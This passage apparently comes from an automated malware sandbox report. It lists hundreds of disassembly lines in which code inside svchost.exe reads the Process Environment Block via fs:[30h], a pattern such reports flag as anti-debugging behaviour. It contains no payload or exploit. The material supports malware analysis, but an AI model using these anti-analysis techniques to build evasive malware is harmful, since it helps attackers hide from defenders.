                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386265C mov eax, dword ptr fs:[00000030h]3_2_0386265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386265C mov ecx, dword ptr fs:[00000030h]3_2_0386265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386265C mov eax, dword ptr fs:[00000030h]3_2_0386265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386666D mov esi, dword ptr fs:[00000030h]3_2_0386666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386666D mov eax, dword ptr fs:[00000030h]3_2_0386666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386666D mov eax, dword ptr fs:[00000030h]3_2_0386666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE660 mov eax, dword ptr fs:[00000030h]3_2_038BE660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830670 mov eax, dword ptr fs:[00000030h]3_2_03830670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872670 mov eax, dword ptr fs:[00000030h]3_2_03872670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872670 mov eax, dword ptr fs:[00000030h]3_2_03872670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE588 mov eax, dword ptr fs:[00000030h]3_2_038AE588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE588 mov eax, dword ptr fs:[00000030h]3_2_038AE588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A580 mov eax, dword ptr fs:[00000030h]3_2_0386A580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A580 mov eax, dword ptr fs:[00000030h]3_2_0386A580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862594 mov eax, dword ptr fs:[00000030h]3_2_03862594
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC592 mov eax, dword ptr fs:[00000030h]3_2_038BC592
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B85AA mov eax, dword ptr fs:[00000030h]3_2_038B85AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038345B0 mov eax, dword ptr fs:[00000030h]3_2_038345B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038345B0 mov eax, dword ptr fs:[00000030h]3_2_038345B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C5C6 mov eax, dword ptr fs:[00000030h]3_2_0386C5C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05C6 mov eax, dword ptr fs:[00000030h]3_2_038B05C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038665D0 mov eax, dword ptr fs:[00000030h]3_2_038665D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5E7 mov ebx, dword ptr fs:[00000030h]3_2_0386A5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5E7 mov eax, dword ptr fs:[00000030h]3_2_0386A5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE5E0 mov eax, dword ptr fs:[00000030h]3_2_038DE5E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC5FC mov eax, dword ptr fs:[00000030h]3_2_038BC5FC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832500 mov eax, dword ptr fs:[00000030h]3_2_03832500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C50D mov eax, dword ptr fs:[00000030h]3_2_0386C50D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C50D mov eax, dword ptr fs:[00000030h]3_2_0386C50D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC51D mov eax, dword ptr fs:[00000030h]3_2_038BC51D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872539 mov eax, dword ptr fs:[00000030h]3_2_03872539
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E547 mov eax, dword ptr fs:[00000030h]3_2_0384E547
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03866540 mov eax, dword ptr fs:[00000030h]3_2_03866540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868540 mov eax, dword ptr fs:[00000030h]3_2_03868540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383254C mov eax, dword ptr fs:[00000030h]3_2_0383254C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6550 mov eax, dword ptr fs:[00000030h]3_2_038C6550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA553 mov eax, dword ptr fs:[00000030h]3_2_038FA553
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384C560 mov eax, dword ptr fs:[00000030h]3_2_0384C560
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830485 mov ecx, dword ptr fs:[00000030h]3_2_03830485
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386648A mov eax, dword ptr fs:[00000030h]3_2_0386648A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386648A mov eax, dword ptr fs:[00000030h]3_2_0386648A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386648A mov eax, dword ptr fs:[00000030h]3_2_0386648A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC490 mov eax, dword ptr fs:[00000030h]3_2_038BC490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038324A2 mov eax, dword ptr fs:[00000030h]3_2_038324A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038324A2 mov ecx, dword ptr fs:[00000030h]3_2_038324A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038644A8 mov eax, dword ptr fs:[00000030h]3_2_038644A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C84BB mov eax, dword ptr fs:[00000030h]3_2_038C84BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E4BC mov eax, dword ptr fs:[00000030h]3_2_0386E4BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038544D1 mov eax, dword ptr fs:[00000030h]3_2_038544D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038544D1 mov eax, dword ptr fs:[00000030h]3_2_038544D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E4EF mov eax, dword ptr fs:[00000030h]3_2_0386E4EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E4EF mov eax, dword ptr fs:[00000030h]3_2_0386E4EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038364F0 mov eax, dword ptr fs:[00000030h]3_2_038364F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D44F8 mov eax, dword ptr fs:[00000030h]3_2_038D44F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D44F8 mov eax, dword ptr fs:[00000030h]3_2_038D44F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A4F0 mov eax, dword ptr fs:[00000030h]3_2_0386A4F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A4F0 mov eax, dword ptr fs:[00000030h]3_2_0386A4F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE4F2 mov eax, dword ptr fs:[00000030h]3_2_038BE4F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE4F2 mov eax, dword ptr fs:[00000030h]3_2_038BE4F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6400 mov eax, dword ptr fs:[00000030h]3_2_038C6400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6400 mov eax, dword ptr fs:[00000030h]3_2_038C6400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382640D mov eax, dword ptr fs:[00000030h]3_2_0382640D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0443 mov eax, dword ptr fs:[00000030h]3_2_038B0443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE461 mov eax, dword ptr fs:[00000030h]3_2_038BE461
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA464 mov eax, dword ptr fs:[00000030h]3_2_038FA464
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838470 mov eax, dword ptr fs:[00000030h]3_2_03838470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838470 mov eax, dword ptr fs:[00000030h]3_2_03838470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382EBC0 mov eax, dword ptr fs:[00000030h]3_2_0382EBC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D6BDE mov ebx, dword ptr fs:[00000030h]3_2_038D6BDE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D6BDE mov eax, dword ptr fs:[00000030h]3_2_038D6BDE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858BD1 mov eax, dword ptr fs:[00000030h]3_2_03858BD1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858BD1 mov eax, dword ptr fs:[00000030h]3_2_03858BD1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904BE0 mov eax, dword ptr fs:[00000030h]3_2_03904BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838B10 mov eax, dword ptr fs:[00000030h]3_2_03838B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838B10 mov eax, dword ptr fs:[00000030h]3_2_03838B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838B10 mov eax, dword ptr fs:[00000030h]3_2_03838B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EB1C mov eax, dword ptr fs:[00000030h]3_2_0385EB1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382CB1E mov eax, dword ptr fs:[00000030h]3_2_0382CB1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CB20 mov eax, dword ptr fs:[00000030h]3_2_0386CB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCB20 mov eax, dword ptr fs:[00000030h]3_2_038BCB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCB20 mov eax, dword ptr fs:[00000030h]3_2_038BCB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCB20 mov eax, dword ptr fs:[00000030h]3_2_038BCB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836B70 mov eax, dword ptr fs:[00000030h]3_2_03836B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836B70 mov eax, dword ptr fs:[00000030h]3_2_03836B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836B70 mov eax, dword ptr fs:[00000030h]3_2_03836B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904B67 mov eax, dword ptr fs:[00000030h]3_2_03904B67
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E6B77 mov eax, dword ptr fs:[00000030h]3_2_038E6B77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864B79 mov eax, dword ptr fs:[00000030h]3_2_03864B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E6A80 mov eax, dword ptr fs:[00000030h]3_2_038E6A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840ACE mov eax, dword ptr fs:[00000030h]3_2_03840ACE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840ACE mov eax, dword ptr fs:[00000030h]3_2_03840ACE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4AC2 mov eax, dword ptr fs:[00000030h]3_2_038D4AC2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D0AE0 mov eax, dword ptr fs:[00000030h]3_2_038D0AE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2AE0 mov eax, dword ptr fs:[00000030h]3_2_038D2AE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2AE0 mov eax, dword ptr fs:[00000030h]3_2_038D2AE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850AEB mov eax, dword ptr fs:[00000030h]3_2_03850AEB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850AEB mov eax, dword ptr fs:[00000030h]3_2_03850AEB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850AEB mov eax, dword ptr fs:[00000030h]3_2_03850AEB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830AED mov eax, dword ptr fs:[00000030h]3_2_03830AED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830AED mov eax, dword ptr fs:[00000030h]3_2_03830AED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830AED mov eax, dword ptr fs:[00000030h]3_2_03830AED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0AFF mov eax, dword ptr fs:[00000030h]3_2_038B0AFF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0AFF mov eax, dword ptr fs:[00000030h]3_2_038B0AFF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0AFF mov eax, dword ptr fs:[00000030h]3_2_038B0AFF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904AE8 mov eax, dword ptr fs:[00000030h]3_2_03904AE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386AA0E mov eax, dword ptr fs:[00000030h]3_2_0386AA0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386AA0E mov eax, dword ptr fs:[00000030h]3_2_0386AA0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EA40 mov eax, dword ptr fs:[00000030h]3_2_0385EA40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EA40 mov eax, dword ptr fs:[00000030h]3_2_0385EA40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038CAA40 mov eax, dword ptr fs:[00000030h]3_2_038CAA40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038CAA40 mov eax, dword ptr fs:[00000030h]3_2_038CAA40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4A57 mov eax, dword ptr fs:[00000030h]3_2_038B4A57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4A57 mov eax, dword ptr fs:[00000030h]3_2_038B4A57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C98F mov eax, dword ptr fs:[00000030h]3_2_0386C98F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C98F mov eax, dword ptr fs:[00000030h]3_2_0386C98F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C98F mov eax, dword ptr fs:[00000030h]3_2_0386C98F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D0980 mov eax, dword ptr fs:[00000030h]3_2_038D0980
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D0980 mov eax, dword ptr fs:[00000030h]3_2_038D0980
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89A0 mov eax, dword ptr fs:[00000030h]3_2_038B89A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038689B0 mov edx, dword ptr fs:[00000030h]3_2_038689B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C69B0 mov eax, dword ptr fs:[00000030h]3_2_038C69B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C69B0 mov eax, dword ptr fs:[00000030h]3_2_038C69B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C69B0 mov ecx, dword ptr fs:[00000030h]3_2_038C69B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038389C0 mov eax, dword ptr fs:[00000030h]3_2_038389C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038389C0 mov eax, dword ptr fs:[00000030h]3_2_038389C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039029CF mov eax, dword ptr fs:[00000030h]3_2_039029CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039029CF mov eax, dword ptr fs:[00000030h]3_2_039029CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309F0 mov eax, dword ptr fs:[00000030h]3_2_038309F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038649F0 mov eax, dword ptr fs:[00000030h]3_2_038649F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038649F0 mov eax, dword ptr fs:[00000030h]3_2_038649F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886912 mov eax, dword ptr fs:[00000030h]3_2_03886912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862919 mov eax, dword ptr fs:[00000030h]3_2_03862919
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862919 mov eax, dword ptr fs:[00000030h]3_2_03862919
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F892E mov eax, dword ptr fs:[00000030h]3_2_038F892E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F892E mov eax, dword ptr fs:[00000030h]3_2_038F892E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC920 mov ecx, dword ptr fs:[00000030h]3_2_038AC920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC920 mov eax, dword ptr fs:[00000030h]3_2_038AC920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC920 mov eax, dword ptr fs:[00000030h]3_2_038AC920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC920 mov eax, dword ptr fs:[00000030h]3_2_038AC920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0388693A mov eax, dword ptr fs:[00000030h]3_2_0388693A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0388693A mov eax, dword ptr fs:[00000030h]3_2_0388693A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0388693A mov eax, dword ptr fs:[00000030h]3_2_0388693A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390492D mov eax, dword ptr fs:[00000030h]3_2_0390492D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C944 mov eax, dword ptr fs:[00000030h]3_2_0386C944
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E94E mov eax, dword ptr fs:[00000030h]3_2_0385E94E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03854955 mov eax, dword ptr fs:[00000030h]3_2_03854955
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03854955 mov eax, dword ptr fs:[00000030h]3_2_03854955
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C958 mov eax, dword ptr fs:[00000030h]3_2_0386C958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384096B mov eax, dword ptr fs:[00000030h]3_2_0384096B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384096B mov eax, dword ptr fs:[00000030h]3_2_0384096B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]3_2_03836970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B488F mov eax, dword ptr fs:[00000030h]3_2_038B488F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856882 mov eax, dword ptr fs:[00000030h]3_2_03856882
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856882 mov eax, dword ptr fs:[00000030h]3_2_03856882
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856882 mov eax, dword ptr fs:[00000030h]3_2_03856882
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387088E mov eax, dword ptr fs:[00000030h]3_2_0387088E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387088E mov edx, dword ptr fs:[00000030h]3_2_0387088E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387088E mov eax, dword ptr fs:[00000030h]3_2_0387088E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E8890 mov eax, dword ptr fs:[00000030h]3_2_038E8890
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E8890 mov eax, dword ptr fs:[00000030h]3_2_038E8890
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
